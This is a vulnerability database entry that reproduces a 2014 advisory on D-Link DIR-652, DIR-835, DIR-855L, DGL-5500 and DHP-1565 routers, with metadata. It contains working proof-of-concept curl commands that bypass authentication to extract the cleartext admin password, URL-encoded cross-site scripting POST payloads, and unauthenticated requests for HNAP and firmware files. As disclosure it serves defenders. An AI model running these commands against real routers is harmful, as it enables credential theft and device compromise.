VAR-201405-0564
Vulnerability from variot - Updated: 2022-05-17 22:48D-Link DIR-652 is a router product of D-Link. Many D-Link routers have the following security vulnerabilities: 1. Password leakage vulnerability 2. Cross-site scripting vulnerability 3. Information disclosure vulnerability. Attackers can use these vulnerabilities to execute HTML and arbitrary script code on the user's browser in the context of the affected device, steal cookie-based authentication, or gain access to sensitive information. The following models are affected: D-Link DIR-652, DIR-835, DIR-855L, DGL-5500, DHP-1565. Other attacks are also possible. The following five D-Link model routers suffer from several vulnerabilities including Clear Text Storage of Passwords, Cross Site Scripting and Sensitive Information Disclosure.
DIR-652 D-Link Wireless N Gigabit Home Router
DIR-835 D-Link Network DIR-835L Wireless N 750M Dual-band 802.11n 4Port Gigabit Router
DIR-855L - D-Link Wireless N900 Dual Band Gigabit Router
DGL-5500 D-Link AC1300 Gaming Router
DHP-1565 D-Link Wireless N PowerLine Gigabit Router
Affected firmware - FW 1.02b18/1.12b02 or older
Access - Remote Complexity - Low Authentication - None Impact - Full loss of confidentiality
Clear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive Information
Authentication can be bypassed to gain access to the file tools_admin.asp, which stores the devices admin password in plain text, by adding a "/" to the end of the URL.
Proof of Concept for the DGL-5500, DIR-855L and the DIR-835:
curl -s http:///tools_admin.asp/ |awk '/hidden/ && /admin_password_tmp/ && /value/ {print $5}'
PoC for the DHP-1565 and DIR-652, the generic 'user' must be added.
curl -s http:///tools_admin.asp/ -u user:|awk '/hidden/ && /admin_password_tmp/ && /value/ {print $5}'
Cross Site Scripting - CWE - CWE-79: Improper Neutralization of User Input / Return
For the file "apply.cgi" ("apply_sec.cgi" on the DGL-5500) the POST param "action" suffers from a XSS vulnerability due to improper neutralization of user input / return output.
PoC for DIR-855L, DIR-835, DHP-1565
http:///apply.cgi
POST graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D HTTP/1.1
For the DGL-5500
http:///apply_sec.cgi
POST graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D HTTP/1.1
Sensitive Information Disclosure - CWE - CWE-200: Information Exposure
The D-Link models DGL-5500, DIR-855L, DIR-835 suffer from a vulnerability which an unauthenticated person can gain access the sensitive files:
http://:8080/hnap.cgi and /HNAP1/ via:
curl -s curl -s http://:8080/HNAP1/
On the DIR-652 and DHP-1565, a user needs authentication first to gain access to these files.
But more importantly, an unauthenticated user can browse directly to http:///cgi/ssi/ which will offer a download of the device's ELF MBS MIPS file. The file contains most of the devices internal working structure and sensitive information. These particular routers use a MSB EM_MIPS Processor and it does contain executable components.
The file can be accessed through at least one known cgi file, however there maybe others. Although no known publicly working example exist to my knowledge, unpatched devices are susceptible to injection of malicious code and most likely susceptible to a payload which could deploy a self-replicating worm.
These items were reported to D-Link on April 20th, and to US Cert on April 21. D-Link does have patches available for all affected models, and it is highly recommended to update the device's firmware as soon as possible.
Vendor Links: http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10025 http://securityadvisories.dlink.com/security/
Research Contact - Kyle Lovett May 21, 2014
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201405-0564",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-855l 1.02b08",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dir-835 1.04b04",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dir-652",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "2.0"
},
{
"model": "dir-652 1.06b05",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dhp-1565",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "1.01"
},
{
"model": "dgl-5500 1.12b02",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "BID",
"id": "67416"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kyle Lovett",
"sources": [
{
"db": "BID",
"id": "67416"
},
{
"db": "PACKETSTORM",
"id": "126779"
},
{
"db": "CNNVD",
"id": "CNNVD-201405-361"
}
],
"trust": 1.0
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-652 is a router product of D-Link. \nMany D-Link routers have the following security vulnerabilities: 1. Password leakage vulnerability 2. Cross-site scripting vulnerability 3. Information disclosure vulnerability. Attackers can use these vulnerabilities to execute HTML and arbitrary script code on the user\u0027s browser in the context of the affected device, steal cookie-based authentication, or gain access to sensitive information. The following models are affected: D-Link DIR-652, DIR-835, DIR-855L, DGL-5500, DHP-1565. Other attacks are also possible. The following five D-Link model routers suffer from several\nvulnerabilities including Clear Text Storage of Passwords, Cross Site\nScripting and Sensitive Information Disclosure. \n\nDIR-652\nD-Link Wireless N Gigabit Home Router\n\nDIR-835\nD-Link Network DIR-835L Wireless N 750M Dual-band 802.11n 4Port Gigabit Router\n\nDIR-855L -\nD-Link Wireless N900 Dual Band Gigabit Router\n\nDGL-5500\nD-Link AC1300 Gaming Router\n\nDHP-1565\nD-Link Wireless N PowerLine Gigabit Router\n\nAffected firmware - FW 1.02b18/1.12b02 or older\n\nAccess - Remote\nComplexity - Low\nAuthentication - None\nImpact - Full loss of confidentiality\n\n-------------------------------------------------------------------------------------------------------------\nClear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive Information\n\nAuthentication can be bypassed to gain access to the file\ntools_admin.asp, which stores the devices admin password in plain\ntext, by adding a \"/\" to the end of the URL. \n\nProof of Concept for the DGL-5500, DIR-855L and the DIR-835:\n\ncurl -s http://\u003cIP\u003e/tools_admin.asp/ |awk \u0027/hidden/ \u0026\u0026\n/admin_password_tmp/ \u0026\u0026 /value/ {print $5}\u0027\n\nPoC for the DHP-1565 and DIR-652, the generic \u0027user\u0027 must be added. \n\ncurl -s http://\u003cIP\u003e/tools_admin.asp/ -u user:|awk \u0027/hidden/ \u0026\u0026\n/admin_password_tmp/ \u0026\u0026 /value/ {print $5}\u0027\n\n-------------------------------------------------------------------------------------------------------------\nCross Site Scripting - CWE - CWE-79: Improper Neutralization of User\nInput / Return\n\nFor the file \"apply.cgi\" (\"apply_sec.cgi\" on the DGL-5500) the POST\nparam \"action\" suffers from a XSS vulnerability due to improper\nneutralization of user input / return output. \n\nPoC for DIR-855L, DIR-835, DHP-1565\n\nhttp://\u003cIP\u003e/apply.cgi\n\nPOST\ngraph_code=X\u0026session_id=123456\u0026login_n=user\u0026login_name=8\u0026action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E\u0026log_pass=\u0026html_response_page=login_pic.asp\u0026tmp_log_pass=\u0026gcode_base64=MTg0MzU%3D\nHTTP/1.1\n\nFor the DGL-5500\n\nhttp://\u003cIP\u003e/apply_sec.cgi\n\nPOST\ngraph_code=X\u0026session_id=123456\u0026login_n=user\u0026login_name=8\u0026action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E\u0026log_pass=\u0026html_response_page=login_pic.asp\u0026tmp_log_pass=\u0026gcode_base64=MTg0MzU%3D\nHTTP/1.1\n\n-------------------------------------------------------------------------------------------------------------\nSensitive Information Disclosure - CWE - CWE-200: Information Exposure\n\nThe D-Link models DGL-5500, DIR-855L, DIR-835 suffer from a\nvulnerability which an unauthenticated person can gain access the\nsensitive files:\n\nhttp://\u003cIP\u003e:8080/hnap.cgi and /HNAP1/ via:\n\ncurl -s curl -s http://\u003cIP\u003e:8080/HNAP1/\n\nOn the DIR-652 and DHP-1565, a user needs authentication first to\ngain access to these files. \n\nBut more importantly, an unauthenticated user can browse directly to\nhttp://\u003cIP\u003e/cgi/ssi/ which will offer a download of the device\u0027s ELF\nMBS MIPS file. The file contains most of the devices internal working\nstructure and sensitive information. These particular routers use a\nMSB EM_MIPS Processor and it does contain executable components. \n\nThe file can be accessed through at least one known cgi file, however\nthere maybe others. Although no known publicly working example exist\nto my knowledge, unpatched devices are susceptible to injection of\nmalicious code and most likely susceptible to a payload which could\ndeploy a self-replicating worm. \n-------------------------------------------------------------------------------------------------------------\n\nThese items were reported to D-Link on April 20th, and to US Cert on\nApril 21. D-Link does have patches available for all affected models,\nand it is highly recommended to update the device\u0027s firmware as soon\nas possible. \n\nVendor Links:\nhttp://securityadvisories.dlink.com/security/publication.aspx?name=SAP10025\nhttp://securityadvisories.dlink.com/security/\n\nResearch Contact - Kyle Lovett\nMay 21, 2014\n",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201405-361"
},
{
"db": "BID",
"id": "67416"
},
{
"db": "PACKETSTORM",
"id": "126779"
}
],
"trust": 0.9
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "67416",
"trust": 0.9
},
{
"db": "CNNVD",
"id": "CNNVD-201405-361",
"trust": 0.6
},
{
"db": "DLINK",
"id": "SAP10025",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "126779",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "67416"
},
{
"db": "PACKETSTORM",
"id": "126779"
},
{
"db": "CNNVD",
"id": "CNNVD-201405-361"
}
]
},
"id": "VAR-201405-0564",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.525
},
"last_update_date": "2022-05-17T22:48:24.897000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/67416"
},
{
"trust": 0.4,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10025"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e/tools_admin.asp/"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e/apply_sec.cgi"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e/apply.cgi"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e/cgi/ssi/"
},
{
"trust": 0.1,
"url": "http://securityadvisories.dlink.com/security/"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e:8080/hnap.cgi"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e:8080/hnap1/"
}
],
"sources": [
{
"db": "BID",
"id": "67416"
},
{
"db": "PACKETSTORM",
"id": "126779"
},
{
"db": "CNNVD",
"id": "CNNVD-201405-361"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "67416"
},
{
"db": "PACKETSTORM",
"id": "126779"
},
{
"db": "CNNVD",
"id": "CNNVD-201405-361"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-05-08T00:00:00",
"db": "BID",
"id": "67416"
},
{
"date": "2014-05-22T22:54:30",
"db": "PACKETSTORM",
"id": "126779"
},
{
"date": "2014-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201405-361"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-05-08T00:00:00",
"db": "BID",
"id": "67416"
},
{
"date": "2014-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201405-361"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201405-361"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link Routers Multiple Security Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "67416"
},
{
"db": "CNNVD",
"id": "CNNVD-201405-361"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "67416"
}
],
"trust": 0.3
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.